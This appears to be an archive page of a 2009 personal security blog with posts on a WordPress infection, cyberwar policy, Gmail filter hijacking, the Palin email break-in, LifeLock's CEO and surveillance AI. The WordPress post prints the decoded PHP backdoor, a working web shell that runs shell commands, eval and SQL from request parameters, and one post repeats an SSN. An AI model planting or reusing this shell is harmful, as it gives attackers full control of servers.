Server at Magic Requires Username Password
August 7, 2009
The Wordpress “Magic” hack!
If your getting this message: “The server (our server domain, e.g. DOMAIN.COM) at Magic” Then you likely have infected code in your wordpress blog.
Wordpress Magic Attack
Wordpress user Yokima reported this very slick hack.
FIX ACTION:
And the fix is to update your blog. This will fix the issue. Make sure you change your password if you actually put your information in that “serve at Magic” message box. Although updating the the wordpress blog definitely fixes the issue, you may have to reload your pluggins too because they may also have some infect code. Doing further research on this matter.
*Similar issues reported by techartist “server BLAH.fuzz.com at Fuzz Access requires a username and password.”
What the infected code looks like after the malware injection into your blog.. yep.. uuugly!
From RocketWood:
We noticed that the code injected into the files was run through an eval and a decode so we decoded the string and found this php code:
{
if (!function_exists('______safeshell'))
{
function ______safeshell($komut) {
@ini_restore("safe_mode");
@ini_restore("open_basedir");
$disable_functions = array_map('trim', explode(',', ini_get('disable_functions')));
if (!empty ($komut)) {
if (function_exists('passthru') && !in_array('passthru', $disable_functions)) {
//@ ob_start();
@ passthru($komut);
//$res = @ ob_get_contents();
//@ ob_end_clean();
}
elseif (function_exists('system') && !in_array('system', $disable_functions)) {
//@ ob_start();
@ system($komut);
//$res = @ ob_get_contents();
//@ ob_end_clean();
}
elseif (function_exists('shell_exec') && !in_array('shell_exec', $disable_functions)) {
$res = @ shell_exec($komut);
echo $res;
}
elseif (function_exists('exec') && !in_array('exec', $disable_functions)) {
@ exec($komut, $res);
$res = join("\n", $res);
echo $res, "\n";
}
elseif (@ is_resource($f = @ popen($komut, "r"))) {
//$res = "";
while (!@ feof($f)) {
//$res .= @ fread($f, 1024);
echo(@ fread($f, 1024));
}
@ pclose($f);
}
else
{
$res = {$komut};
echo $res;
}
}
}
};
if (isset ($_REQUEST['php_bdb7e9f039f4c7d9100073e131610a87'])) {
echo "
if ($_REQUEST['php_bdb7e9f039f4c7d9100073e131610a87'] == 'eval') {
eval(get_magic_quotes_gpc() || get_magic_quotes_runtime() ? stripslashes($_REQUEST['cmd']) : $_REQUEST['cmd']);
}
else if ($_REQUEST['php_bdb7e9f039f4c7d9100073e131610a87'] == 'exec') {
______safeshell(get_magic_quotes_gpc() || get_magic_quotes_runtime() ? stripslashes($_REQUEST['cmd']) : $_REQUEST['cmd']);
}
else if ($_REQUEST['php_bdb7e9f039f4c7d9100073e131610a87'] == 'query') {
$result = mysql_query(get_magic_quotes_gpc() || get_magic_quotes_runtime() ? stripslashes($_REQUEST['cmd']) : $_REQUEST['cmd'], $wpdb->dbh);
if (!$result)
{
echo "php_bdb7e9f039f4c7d9100073e131610a87_result_MYSQL_QUERY_FAILED: ", mysql_error($wpdb->dbh), "\n";
die();
}
else if (is_resource($result))
{
$res = array();
while ($row = mysql_fetch_assoc($result))
{
$res[] = $row;
};
mysql_free_result($result);
echo serialize($res);
die();
}
else
{
echo "php_bdb7e9f039f4c7d9100073e131610a87_result_MYSQL_QUERY_SUCCEEDED: ", mysql_affected_rows($wbdb->dbh), " rows affected\n";
die();
}
};
echo "\n\n";
die();
};
};
p.s: don’t feel too bad, even the security masters get hacked by malicious S.O.B’s.
Popularity: 1% [?]
You Hack US, We Nuke You!
May 28, 2009
The United States’ top commanding officer for the space and cyber domains told reporters last week that a cyber attack could merit a more conventional military response.
During a press briefing on Thursday, U.S. Air Force General Kevin Chilton, who heads the U.S. Strategic Command, told reporters that top Pentagon advisors would not rule out a physical attack on any force that attacks the United States through the Internet. Currently, the military’s networks are probed thousands of times a day, but the goal of attackers seems to be espionage, not to take down critical networks, he told reporters –
I don’t believe that military force is the equivalent action for a cyber attack. Arrest and/or apprehension is the physical response necessary for criminal hackers attacking from other countries. Cyber counter-attacks are the correct response for government funded & coordinated attacks.
I think if the U.S. reciprocates a cyber attack x10 when other countries are playing little games, we’d get our message across effectively. We should do so in a well funded and covert way in which the enemy has NO DOUBT that the face slap came from a U.S, hand, but no proof at all allowing plausible deniability. It should be black Ops hacks, very well coordinated, very well funded and full time.
I don’t think the US can be complacent or wrecklessly meek in matters of cyber warfare. Instead, it must be fair, quiet and heavy handed when it comes to one of its most valuable asset, information.
Popularity: 5% [?]
Critical Infrastructure Infiltrated
April 8, 2009
So apparently, part of the U.S. critical infrastructure has already been exploited. It doesn’t surprise me. Its all fun and games with developers, engineers and scientists until their ass is getting hacked. They resist. They say “who the hell would hack this system” “HOW the hell would they hack it”. They cut corners and make excuses. Then, when the system is hacked, they blame it on the rain. The good news is that they know its been infiltrated.
I wonder why they didn’t design it as a closed network. Make all critical functions completely inaccessible to the outside world. It’s got me wondering if they even used an Information Assurance standard.
Popularity: 5% [?]
where the hell is DC719?
April 3, 2009
I’ve been thinking of going to Defcon17 this year, but I’m reluctant because I keep remembering how lonely I was the last time I went Defcon14. There I was at the MECCA of all things security basking in the glow of technological brilliance and completely alone.
Everyone seems to have a crew there. All loners I meet are to paranoid to talk to anyone. So I end up going from lecture to lecture alone. Don’t get me wrong. I like learning new things.. But too often I feel like it was something I could have just watched on TV (if it was on TV). I want to get more involved, but I don’t have skills or the time to dedicate to another mega hobby like Hacking.
So I thought about rolling out with DC719 (my local defcon group), but I’ve yet to find them. dc719.org seems to have not paid their bill or something. I heard they are all crazy gun nuts, which I think is pretty awesome. Guns and hacking seems like my kind of crowd. Strange, huh?
Anyway, dc719.. if your out there hit me up .. I might want to roll with you guys [or at least say hi]. elamb[dot]security[at]gmail.com
Popularity: 5% [?]
More GMAIL Problems
November 22, 2008
This was news I could not ignore because I really, really like Gmail. These hacks are ridiculous. I hope that google is getting a handle on this. It looks like the accounts are getting hacked with some sort of script that runs from a site or email while gmail is opened:
According to David Airey & gnucitizen.org:
The victim visits a page while being logged into GMail. Upon execution, the page performs a multipart/form-data POST to one of the GMail interfaces and injects a filter into the victim’s filter list. In the example above, the attacker writes a filter, which simply looks for emails with attachments and forward them to an email of their choice. This filter will automatically transfer all emails matching the rule. Keep in mind that future emails will be forwarded as well. The attack will remain present for as long as the victim has the filter within their filter list, even if the initial vulnerability, which was the cause of the injection, is fixed by Google.
– gnucitizen
As many of you already know on November 2nd, MakeUseOf.com’s domain was stolen from us. It took us about 36 hours to get the domain back. As we have pointed out earlier the hacker somehow managed to get access to my Gmail account and from there to our GoDaddy account, unlock the domain and move it to another registrar.
You can see the whole story on our temporary blog makeuseof-temporary.blogspot.com/
I wasn’t planning to publish anything about the incident or cracker (person who steals domains) and how he managed to pull it off unless I was completely sure about it myself. I had a good feeling it was a Gmail security flaw but wanted to confirm it before posting anything about it on MakeUseOf. We love Gmail and giving them bad publicity is not something we would ever want to do.
Now the thing is the domain name domainsgames.org is protected by Moniker and they hide all the contact info for it.
Domain ID:D154519952-LROR
Domain Name:DOMAINSGAME.ORG
Created On:22-Oct-2008 07:35:56 UTC
Last Updated On:08-Nov-2008 12:11:53 UTC
Expiration Date:22-Oct-2009 07:35:56 UTC
Sponsoring Registrar:Moniker Online Services Inc. (R145-LROR)
Status:CLIENT DELETE PROHIBITED
Status:CLIENT TRANSFER PROHIBITED
Status:CLIENT UPDATE PROHIBITED
Status:TRANSFER PROHIBITED
Registrant ID:MONIKER1571241
.
.
.
.
Name Server:NS3.DOMAINSERVICE.COM
Name Server:NS2.DOMAINSERVICE.COM
Name Server:NS1.DOMAINSERVICE.COM
Name Server:NS4.DOMAINSERVICE.COM
More at Makeusof.com
Popularity: 18% [?]
Al Qaeda Sites getting Hacked
October 23, 2008
This was an article that really cheered me up today. Al Qaeda websites are still getting hacked constantly. Sometimes it seems that the free world is WAY off on the “War on Terror”. With most resources going to Iraq, political rhetoric and pandering and the almost complete absence of anyone talking about capturing and/or killing Osama bin Laden, its easy to get discouraged. Its good to see that the cyberwar is still being waged on those who promote and or support terrorism.
Octavia Nasr | BIO
CNN senior editor for Arab affairsA hacking war is raging on Jihadi websites. Radical Islamist sites have been attacking and getting attacked for quite some time. The website hacking practice was common in 2001 and 2002… Following the 9/11 attacks when al Qaeda used only one website to communicate its messages to supporters and foes alike. That website was called alneda.com. It was getting constantly hacked… sometimes several hackings a day. After every hacking the site managed to resurface on the net until it disappeared from the scene in 2004 to be replaced by other websites — What started as one al Qaeda-linked site mushroomed into dozens which branched out into hundreds of supporting sites that serve as dissemination centers over the internet.
Popularity: 9% [?]
Palin’s password was Popcorn?
October 9, 2008
I was wondering why conservative talk were accusing the Dems and/or liberals for hacking Palin’s account. Apparently, the guy who hacked into her account (gov.palin@yahoo.com) is the son of Rep. Mike Kernell, Tennessee state lawmaker. He simply used the “forgot my password” feature and then used publically available information to answer the security questions.
“Gov. Palin’s Alleged Hacker Indicted; Password Was ‘Popcorn’
A 20-year-old student at the University of Tennessee has been indicted for breaking into one of the email accounts of Gov. Sarah Palin and then posting screenshots of personal information obtained there to a public Web-site.
David Kernell, the son of a Democratic state lawmaker, was led into a Knoxville federal court wearing handcuffs and shackles on his ankles today and was released without posting bond, according to the Associated Press.”
Hope she’s changing all her passwords because more than likely they are all “Popcorn”.
http://voices.washingtonpost.com/cgi-bin/mt/mt-tb.cgi/25730
read more | digg story
Popularity: 10% [?]
Phlash Dance: phlashing
June 9, 2008
Phlashing allows you to damage hardware over the Internet. This is something new and consists of flashing, as in changing the firmware, or computer code in chips on your motherboard, controller cards or other hardware. Since more modern systems allow flashing firmware over a network for quick updates, this is now an exploitable vulnerability. Previously, you had to “flash” those computer chips from the machine that contained them.
There are security features in hardware to prevent this kind of vandalism, but unfortunately some flaws enable hackers to flash destructively. Phlashing code has already been developed by security researchers and hackers. Phlashing attacks are not easy and will likely not be common, however its a possible glimpse of the coming storm of weapons of cyber destruction.
“Phlashing” attacks could render network hardware useless
Most computer security coverage focuses on the PC realm, but Rich Smith, head of HP’s Systems Security Lab, has identified a potential security flaw within a network’s physical hardware rather than a typical desktop or server system. Smith’s report focuses on a class of devices he refers to as Network Enabled Embedded Devices (NEEDS for short), and how such systems could be attacked at the firmware level through a process he refers to as “phlashing.” – more at Arstechnica
Popularity: 17% [?]
LifeLock Guy Hacked :(
May 22, 2008
I think this is a sad day. A sad day indeed. Todd Davis, CEO of Lifelock (his social security #457-55-5462). Todd Davis has promoted his company by advertising his social security number on the web, radio, tv and billboard signs.
My name is Todd Davis
My social security number is 457-55-5462I’m Todd Davis, CEO of LifeLock, and yes, that’s my real social security number*. Identity theft is one of the fastest growing crimes in America, victimizing over 10 million people a year and costing billions of dollars. So why publish my social security number? Because I’m absolutely confident LifeLock is protecting my good name and personal information, just like it will yours. And we guarantee our service up to $1 million dollars.”
While I’ve always thought that it was a risky way to promote one business (lol), I’ve always believed that it was a good idea. What they do is monitor your credit card and fico information and alert you if there is anything suspicious. It works (you can also do your self for free). But the Life lock service doesn’t protect you 100% from identity theft.
Some guy in Texas took Todd’s personal information and used it for a pay day load (there is not system to actively keep track of the Payday loan market). So the guy was able to get $500. When it was time to pay back the Payday loan (+1million% interest or whatever it is) the Payday store called the REAL Todd Davis (social security #457-55-5462). I think its unfortunate because it seems like a pretty good service. They are one of the few organizations in the U.S. actually trying to help people take on what is now and epidemic with now grassroots effort to slowdown ID theft and financial fraud.
Although Todd Davis was hacked, I believe their product will still be an effective way to be proactive method of protecting yourself from ID theft & financial fraud. But you should definitely take extra steps to safe guard your personal information. Don’t advertise your social security, your physical address, phone number, birthday or critical information.
Its $10 a month. I’m thinking of doing it just so I can contribute to their cause.
Popularity: 12% [?]
Computers Hacking People ver 2.0
May 10, 2008
[display_podcast]
I honestly think you ought to calm down; take a stress pill and think things over. – Hal, 2001 Space Odyssey
Information Systems will eventually have the infrastructure and ability to “socially engineer” its creators. This is far fetched science fiction blooming before our very eyes being created by our own hands.
It will happen when three criteria are in place: 1) The creation of laws that can completely disregard the privacy and sovereignty of human beings. 2) The advancement of Information Awareness System and 3) Smart Artificial Intelligence
LAWS
Lets discuss the situations that will give governments the pretext to implement laws to track their citizens. This is happening now. Laws and systems are being created for unchecked monitoring of individuals under the guise of security, safety and prosperity. Systems such as national ID cards.
They were implemented after the Sept 11 attacks on the World Trade Center and in the U.K. after the 7 July attacks in London.
It was 19th Century philosopher Samuel T. Coleridge who said, “In politics, what begins in fear usually ends in folly.”
Imagine it: The PATRIOT ACT IV is passed as a result of recent Critical Infrastructure cyber-terrorism attacks. International terrorists implement a globally synchronized Distributed Denial of Service Attack against the worlds Root nameservers and successfully cripple the Internet for three days. The impact is devastating as corporations lose billions.
Domestic Cyber Terrorists infiltrate hospitals by becoming apart of the staff only to socially engineer and infecting HIPPA protected networks with virus’ that wipe out databases and actually scramble prescriptions causing an array of death by misdiagnoses.
Local police and security personnel repeatedly thwart numerous attempts by religious fundamentalists to detonate suit case sized tactical nuclear weapons inside major United State cities but security professionals predict that it is only a matter of time before at least one slips through the cracks. All the enemy needs is one.
Patriot Act IV is the patron saint of lawmakers who have been screamed at by constituents to “DO SOMETHING NOW!” The new Patriot Act is eventually internationally accepted and allows for unrestricted Data Mine into commercial and state owned databases worldwide (US-EU). It of course has deferent names and variations world wide but its application is the same. In the United Kingdom it is called the Civil Contingencies Bill. The data mining would tap into the “transaction space” by accessing hospital, financial transaction and legal databases world wide to be shared by all law enforcement agencies (county, federal, city local and international). The system works like a global Amber Alert system that can track criminals anywhere in the world and notify the respective local agency immediately. The system works very, very well.
I honestly think you ought to calm down; take a stress pill and think things over. – Hal, 2001 Space Odyssey
Information Systems will eventually have the infrastructure and ability to “socially engineer” its creators. This is far fetched science fiction blooming before our very eyes being created by our own hands.
It will happen when three criteria are in place: 1) The creation of laws that can completely disregard the privacy and sovereignty of human beings. 2) The advancement of Information Awareness System and 3) Smart Artificial Intelligence
LAWS
Lets discuss the situations that will give governments the pretext to implement laws to track their citizens. This is happening now. Laws and systems are being created for unchecked monitoring of individuals under the guise of security, safety and prosperity. Systems such as national ID cards.
They were implemented after the Sept 11 attacks on the World Trade Center and in the U.K. after the 7 July attacks in London.
It was 19th Century philosopher Samuel T. Coleridge who said, “In politics, what begins in fear usually ends in folly.”
Imagine it: The PATRIOT ACT IV is passed as a result of recent Critical Infrastructure cyber-terrorism attacks. International terrorists implement a globally synchronized Distributed Denial of Service Attack against the worlds Root nameservers and successfully cripple the Internet for three days. The impact is devastating as corporations lose billions.
Domestic Cyber Terrorists infiltrate hospitals by becoming apart of the staff only to socially engineer and infecting HIPPA protected networks with virus’ that wipe out databases and actually scramble prescriptions causing an array of death by mis diagnosis.
Local police and security personnel repeatedly thwart numerous attempts by religious fundamentalists to detonate suit case sized tactical nuclear weapons inside major United State cities but security professionals predict that it is only a matter of time before at least one slips through the cracks. All the enemy needs is one.
Patriot Act IV is the patron saint of lawmakers who have been screamed at by constituents to “DO SOMETHING NOW!” The new Patriot Act is eventually internationally accepted and allows for unrestricted Data Mine into commercial and state owned databases worldwide (US-EU). It of course has deferent names and variations world wide but its application is the same. In the United Kingdom it is called the Civil Contingencies Bill. The data mining would tap into the “transaction space” by accessing hospital, financial transaction and legal databases world wide to be shared by all law enforcement agencies (county, federal, city local and international). The system works like a global Amber Alert system that can track criminals anywhere in the world and notify the respective local agency immediately. The system works very, very well.
Information Awareness Systems
The system, developed under the direction of John Poindexter, then-director of DARPA’s Information Awareness Office, was envisioned to give law enforcement access to private data without suspicion of wrongdoing or a warrant. — Electronic Privacy Information Center.
Government funded unrestricted Data Mining and Information Awareness programs develop and run revolutionary Information Awareness Systems. Despite public opinion, these National Security systems continue to work to protect the nation against enemies foreign and domestic. The system extracts data from its transactional databases and recognizes patterns of behavior that would fit that of a terrorist. The system is so exhaustive that is works with 70% accuracy and seamlessly in conjunction with systems such as Next Generation Facial Recognition systems and Activity, Recognition Monitoring for enhanced surveillance.
Artificial Intelligence
Within thirty years, we will have the technological means to create superhuman intelligence. Shortly after, the human era will be ended. – Vernon Vinge, 1993, What is the Singularity?
Artificial Intelligence has been in use for many years. It is greatly relied upon for businesses, hospitals, military units and even in forms of entertainment such as video games. However Strong Artificial Intelligence, the development of cognitive systems simulating the human brain, have been developing quietly in research labs around the world under programs dedicated to the “scientific understanding of the mechanisms underlying thought and intelligent behavior and their embodiment in machines. (AAAI)”
Smart Information Awareness is Strong Artificial Intelligence merged with Information Awareness Systems. Smart Information Awareness seems to go beyond merely recognizing patterns of behavior as it predicts the future actions of a given psychological profile with over 75% accuracy allowing Law Enforcement to be like an all seeing eye with incredible new methods of forensics and counterterrorism. Crime as a whole will be greatly reduced. System that recognize criminal patterns have been around for some time, Smart Information Awareness systems are a new trend.
The Smart Information Awareness system is so accurate in determining human behavior trends that it is used to track and manipulate consumer buying habits for corporations. With its accuracy, the system will be able to determine what marketing tools can be used to influence the behavior of buyers.
With unfettered access to consumer’s personal transactions, buying habits, methods of payment, and credit history a system would be able to pin point buyers who demonstrate interests in certain products and offer “special deals” a specific group of highly interested buyers.
Inevitably the very system (laws, practices and technologies) that successfully protects humanity from itself is used to manipulate and exploit humanity.
Perhaps you believe that there is nothing wring with this level of target marketing. If so, I submit to you these questions: What will separate humanity from cattle if every man, woman and child is seen as nothing but a number and a consumer to the system that we rely on to survive? Since we are already regarded as merely numbers and consumers by the corporate beast, how much control and information will we allow them to have?
Perhaps this is a bit much. Perhaps I exaggerate the technology and extent of fear that will breed it.
http://www.p2pnet.net/issue03/page1.html
http://www.jbholston.com/weblog_discussion.php?post_id=74
Statewatch.com – Secret EU-US agreement being negotiated. http://www.statewatch.org/news/2002/jul/11Auseu.htm
http://www.eff.org/Privacy/TIA/20030523_tia_report_review.php
nin – TheSlip (thanks Trent)
Ray Kurzweil @ Google Zeitgeist
Eschelon TIA – Total Information Awareness
Popularity: 13% [?]
